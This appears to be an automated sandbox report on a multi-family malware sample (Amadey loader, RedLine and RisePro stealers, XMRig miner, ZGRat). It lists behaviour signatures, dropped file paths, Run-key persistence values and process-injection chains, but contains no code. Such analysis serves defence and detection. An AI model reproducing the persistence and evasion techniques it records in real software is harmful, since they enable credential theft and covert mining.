Malware Analysis Report

2025-01-22 10:25

Sample ID 240124-evdwesaec6
Target ec2c94a21a52027c229a7824d4a1c5ca.bin
SHA256 3c2e54cf5340c3b1c1a013e1748db7359339eb1280d73f7f3278eab8c40f7b63
Tags
amadey redline risepro xmrig zgrat discovery evasion infostealer miner persistence rat spyware stealer trojan @pixelscloud @rlreborn cloud tg: @fatherofcarders) livetraffic
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

3c2e54cf5340c3b1c1a013e1748db7359339eb1280d73f7f3278eab8c40f7b63

Threat Level: Known bad

The file ec2c94a21a52027c229a7824d4a1c5ca.bin was found to be: Known bad.

Malicious Activity Summary

amadey redline risepro xmrig zgrat discovery evasion infostealer miner persistence rat spyware stealer trojan @pixelscloud @rlreborn cloud tg: @fatherofcarders) livetraffic

RedLine

RedLine payload

RisePro

xmrig

Amadey

Detect ZGRat V1

ZGRat

XMRig Miner payload

Modifies Windows Firewall

Creates new service(s)

Downloads MZ/PE file

Stops running service(s)

Blocklisted process makes network request

Checks BIOS information in registry

Reads user/profile data of web browsers

Executes dropped EXE

Checks computer location settings

Loads dropped DLL

Accesses cryptocurrency files/wallets, possible credential harvesting

Adds Run key to start application

Legitimate hosting services abused for malware hosting/C2

Checks installed software on the system

Suspicious use of NtSetInformationThreadHideFromDebugger

Suspicious use of SetThreadContext

Launches sc.exe

Program crash

Unsigned PE

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Checks SCSI registry key(s)

Creates scheduled task(s)

Suspicious behavior: LoadsDriver

Suspicious use of FindShellTrayWindow

Suspicious behavior: CmdExeWriteProcessMemorySpam

Delays execution with timeout.exe

Suspicious use of SetWindowsHookEx

Views/modifies file attributes

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-01-24 04:15

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-01-24 04:15

Reported

2024-01-24 04:18

Platform

win7-20231215-en

Max time kernel

139s

Max time network

154s

Command Line

"C:\Users\Admin\AppData\Local\Temp\cfd185173a9199f41d4819c7479cd868f6d913b0ca02a37ef93a802939889a6e.exe"

Signatures

Amadey

trojan amadey

Detect ZGRat V1

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

RisePro

stealer risepro

ZGRat

rat zgrat

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Creates new service(s)

persistence

Downloads MZ/PE file

Stops running service(s)

evasion

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1000573001\moto.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\ProgramData\eyfisgalqlbk\iojmibhyhiws.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\ProgramData\eyfisgalqlbk\iojmibhyhiws.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1000573001\moto.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000564001\num.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000567001\rback.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000569001\leg221.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000570001\leg221.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000571001\Gzxzuhejdab.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000572001\crypted.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\xfAk7rC2FeEN35Y8o.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000573001\moto.exe N/A
N/A N/A N/A N/A
N/A N/A C:\ProgramData\eyfisgalqlbk\iojmibhyhiws.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\d887ceb89d\qemu-ga.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\cfd185173a9199f41d4819c7479cd868f6d913b0ca02a37ef93a802939889a6e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe N/A
N/A N/A C:\Windows\system32\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Windows\system32\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe N/A
N/A N/A C:\Windows\system32\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Windows\system32\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe N/A
N/A N/A C:\Windows\system32\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Windows\system32\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Windows\system32\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Windows\system32\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Windows\system32\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Windows\system32\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A

Reads user/profile data of web browsers

spyware stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Windows\CurrentVersion\Run\num.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1000564001\\num.exe" C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Windows\CurrentVersion\Run\rback.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1000567001\\rback.exe" C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe N/A

Checks installed software on the system

discovery

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000567001\rback.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000567001\rback.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000567001\rback.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000567001\rback.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000567001\rback.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000567001\rback.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000567001\rback.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000567001\rback.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000567001\rback.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000567001\rback.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000567001\rback.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000567001\rback.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000567001\rback.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe N/A

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious behavior: CmdExeWriteProcessMemorySpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\xfAk7rC2FeEN35Y8o.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000573001\moto.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000573001\moto.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000573001\moto.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000573001\moto.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000573001\moto.exe N/A
N/A N/A C:\ProgramData\eyfisgalqlbk\iojmibhyhiws.exe N/A
N/A N/A C:\ProgramData\eyfisgalqlbk\iojmibhyhiws.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\1000571001\Gzxzuhejdab.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\system32\conhost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\cfd185173a9199f41d4819c7479cd868f6d913b0ca02a37ef93a802939889a6e.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1588 wrote to memory of 2784 N/A C:\Users\Admin\AppData\Local\Temp\cfd185173a9199f41d4819c7479cd868f6d913b0ca02a37ef93a802939889a6e.exe C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe
PID 1588 wrote to memory of 2784 N/A C:\Users\Admin\AppData\Local\Temp\cfd185173a9199f41d4819c7479cd868f6d913b0ca02a37ef93a802939889a6e.exe C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe
PID 1588 wrote to memory of 2784 N/A C:\Users\Admin\AppData\Local\Temp\cfd185173a9199f41d4819c7479cd868f6d913b0ca02a37ef93a802939889a6e.exe C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe
PID 1588 wrote to memory of 2784 N/A C:\Users\Admin\AppData\Local\Temp\cfd185173a9199f41d4819c7479cd868f6d913b0ca02a37ef93a802939889a6e.exe C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe
PID 2784 wrote to memory of 2444 N/A C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe C:\Windows\SysWOW64\schtasks.exe
PID 2784 wrote to memory of 2444 N/A C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe C:\Windows\SysWOW64\schtasks.exe
PID 2784 wrote to memory of 2444 N/A C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe C:\Windows\SysWOW64\schtasks.exe
PID 2784 wrote to memory of 2444 N/A C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe C:\Windows\SysWOW64\schtasks.exe
PID 2784 wrote to memory of 2580 N/A C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe C:\Users\Admin\AppData\Local\Temp\1000564001\num.exe
PID 2784 wrote to memory of 2580 N/A C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe C:\Users\Admin\AppData\Local\Temp\1000564001\num.exe
PID 2784 wrote to memory of 2580 N/A C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe C:\Users\Admin\AppData\Local\Temp\1000564001\num.exe
PID 2784 wrote to memory of 2580 N/A C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe C:\Users\Admin\AppData\Local\Temp\1000564001\num.exe
PID 2784 wrote to memory of 1728 N/A C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe C:\Users\Admin\AppData\Local\Temp\1000567001\rback.exe
PID 2784 wrote to memory of 1728 N/A C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe C:\Users\Admin\AppData\Local\Temp\1000567001\rback.exe
PID 2784 wrote to memory of 1728 N/A C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe C:\Users\Admin\AppData\Local\Temp\1000567001\rback.exe
PID 2784 wrote to memory of 1728 N/A C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe C:\Users\Admin\AppData\Local\Temp\1000567001\rback.exe
PID 2784 wrote to memory of 2552 N/A C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe C:\Users\Admin\AppData\Local\Temp\1000569001\leg221.exe
PID 2784 wrote to memory of 2552 N/A C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe C:\Users\Admin\AppData\Local\Temp\1000569001\leg221.exe
PID 2784 wrote to memory of 2552 N/A C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe C:\Users\Admin\AppData\Local\Temp\1000569001\leg221.exe
PID 2784 wrote to memory of 2552 N/A C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe C:\Users\Admin\AppData\Local\Temp\1000569001\leg221.exe
PID 2580 wrote to memory of 1732 N/A C:\Users\Admin\AppData\Local\Temp\1000564001\num.exe C:\Windows\system32\cmd.exe
PID 2580 wrote to memory of 1732 N/A C:\Users\Admin\AppData\Local\Temp\1000564001\num.exe C:\Windows\system32\cmd.exe
PID 2580 wrote to memory of 1732 N/A C:\Users\Admin\AppData\Local\Temp\1000564001\num.exe C:\Windows\system32\cmd.exe
PID 2580 wrote to memory of 1732 N/A C:\Users\Admin\AppData\Local\Temp\1000564001\num.exe C:\Windows\system32\cmd.exe
PID 2784 wrote to memory of 2140 N/A C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe C:\Users\Admin\AppData\Local\Temp\1000570001\leg221.exe
PID 2784 wrote to memory of 2140 N/A C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe C:\Users\Admin\AppData\Local\Temp\1000570001\leg221.exe
PID 2784 wrote to memory of 2140 N/A C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe C:\Users\Admin\AppData\Local\Temp\1000570001\leg221.exe
PID 2784 wrote to memory of 2140 N/A C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe C:\Users\Admin\AppData\Local\Temp\1000570001\leg221.exe
PID 1732 wrote to memory of 2008 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\mode.com
PID 1732 wrote to memory of 2008 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\mode.com
PID 1732 wrote to memory of 2008 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\mode.com
PID 1732 wrote to memory of 1744 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 1732 wrote to memory of 1744 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 1732 wrote to memory of 1744 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 2784 wrote to memory of 1808 N/A C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe C:\Users\Admin\AppData\Local\Temp\1000571001\Gzxzuhejdab.exe
PID 2784 wrote to memory of 1808 N/A C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe C:\Users\Admin\AppData\Local\Temp\1000571001\Gzxzuhejdab.exe
PID 2784 wrote to memory of 1808 N/A C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe C:\Users\Admin\AppData\Local\Temp\1000571001\Gzxzuhejdab.exe
PID 2784 wrote to memory of 1808 N/A C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe C:\Users\Admin\AppData\Local\Temp\1000571001\Gzxzuhejdab.exe
PID 1732 wrote to memory of 2372 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 1732 wrote to memory of 2372 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 1732 wrote to memory of 2372 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 2784 wrote to memory of 2156 N/A C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe C:\Users\Admin\AppData\Local\Temp\1000572001\crypted.exe
PID 2784 wrote to memory of 2156 N/A C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe C:\Users\Admin\AppData\Local\Temp\1000572001\crypted.exe
PID 2784 wrote to memory of 2156 N/A C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe C:\Users\Admin\AppData\Local\Temp\1000572001\crypted.exe
PID 2784 wrote to memory of 2156 N/A C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe C:\Users\Admin\AppData\Local\Temp\1000572001\crypted.exe
PID 1732 wrote to memory of 2380 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 1732 wrote to memory of 2380 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 1732 wrote to memory of 2380 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 1732 wrote to memory of 1992 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe
PID 1732 wrote to memory of 1992 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe
PID 1732 wrote to memory of 1992 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe
PID 1732 wrote to memory of 1984 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 1732 wrote to memory of 1984 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 1732 wrote to memory of 1984 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
